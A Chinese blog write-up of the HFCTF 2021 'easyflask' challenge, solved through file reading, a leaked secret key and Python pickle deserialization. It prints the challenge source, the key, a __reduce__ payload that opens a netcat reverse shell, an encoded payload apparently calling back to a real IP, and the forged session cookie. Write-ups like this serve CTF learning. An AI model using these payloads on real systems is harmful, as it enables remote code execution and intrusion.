[HFCTF 2021 Final]easyflask

尘佑不尘2024-03-21 13:03

[HFCTF 2021 Final]easyflask

\[python反序列化\]

  • 首先题目给了提示,有文件读取漏洞,读取源码
python 复制代码 
#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):#如果u对应的值是字典,会读取  u.b
            u = b64decode(u.get('b'))
        u = pickle.loads(u)#pickle反序列化
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
app.run('0.0.0.0', port=80, debug=False)

  • 我们可以发现/admin目录下面有反序列化函数,但是我们直接反问不行

  • 需要知道密钥,尝试读取/proc/self/environ,得到

    glzjin22948575858jfjfjufirijidjitg3uiiuuh

通过

python 复制代码 
        u = session.get('u')
        if isinstance(u, dict):#如果u对应的值是字典,会读取  u.b
            u = b64decode(u.get('b'))
        u = pickle.loads(u)#pickle反序列化

我们可以知道,需要构造的秘钥结构:{"u":{"b":"反序列化的内容"}}

  • 通过源码可知,这是python3.6,使用python3脚本进行构造
python 复制代码 
import base64  
import pickle  
  
  
class User(object):  
def __reduce__(self):  
return (eval, ("__import__('os').system('nc ip port -e/bin/sh')",))  
  
  
print(base64.b64encode(pickle.dumps(User())))

得到:

payload

复制代码 
python3 flask_session_cookie_manager3.py encode -t '{"u":{"b":"gASVUQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDZiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzExNy41MC4xOTAuMTU1LzY2NjYgMD4mMSeUhZRSlC4="}}' -s "glzjin22948575858jfjfjufirijidjitg3uiiuuh"

得到
.eJyrVipVsqpWSlKyUkp3DA4LDXSEAmdfpwinsmSjHJMcz3L3ZOOcqhT3sJIcL__QLJeozMgIv3xPZ8MsT-cUGLvA08Uk19PZMjsqIrIsxd2v3KfKtcKv0sTQ19mkwj_EsdQ3JNTQpyrSyC8rMt0XqNY3ODU0IyooOMfZxFapthYAzr8sbA.ZXMgvg.5o4NfEz84xfp9DPivNGKpmxTdd0

监听
nc -lvnp 6666
直接
cat /flag
相关推荐
钰衡大师几秒前
Vue 3 源码阅读笔记:ref.ts
javascript·vue.js·笔记·vue3源码阅读
亚里随笔6 分钟前
OpenClaw-RL:让AI Agent在对话中自主学习进化
人工智能·学习·llm·rl·agentic
嘉琪0016 分钟前
Day4 完整学习包(this 指向)——2026 0313
前端·javascript·学习
for_ever_love__9 分钟前
Objective-C 学习 单例模式
学习·ios·单例模式·objective-c
程序员夏末18 分钟前
【LeetCode | 第四篇】算法笔记
笔记·算法·leetcode
WJSKad123525 分钟前
Ghost瓶颈轻量化改进YOLOv26双路径特征生成与残差学习协同突破
学习·yolo
张永清-老清27 分钟前
每周读书与学习->Jmeter中如何使用Bean Shell脚本(二)Bean Shell的基础语法之变量与数据类型
学习·测试工具·jmeter·压力测试·性能调优·jmeter性能测试·性能分析
食指Shaye29 分钟前
docker的学习日记
学习·docker·eureka
科技林总36 分钟前
【系统分析师】11.3 软件需求获取
学习
盐水冰38 分钟前
【烘焙坊项目】后端搭建(7)- 套餐管理界面
java·学习
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南05OpenClaw 飞书机器人不回复消息?3 小时踩坑总结06OpenClaw macOS 完整安装与本地模型配置教程(实战版)07得物前端部门,没了08OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录09Window 10部署openclaw报错node.exe : npm error code 12810OpenClaw 接入 QQ Bot 完整实践指南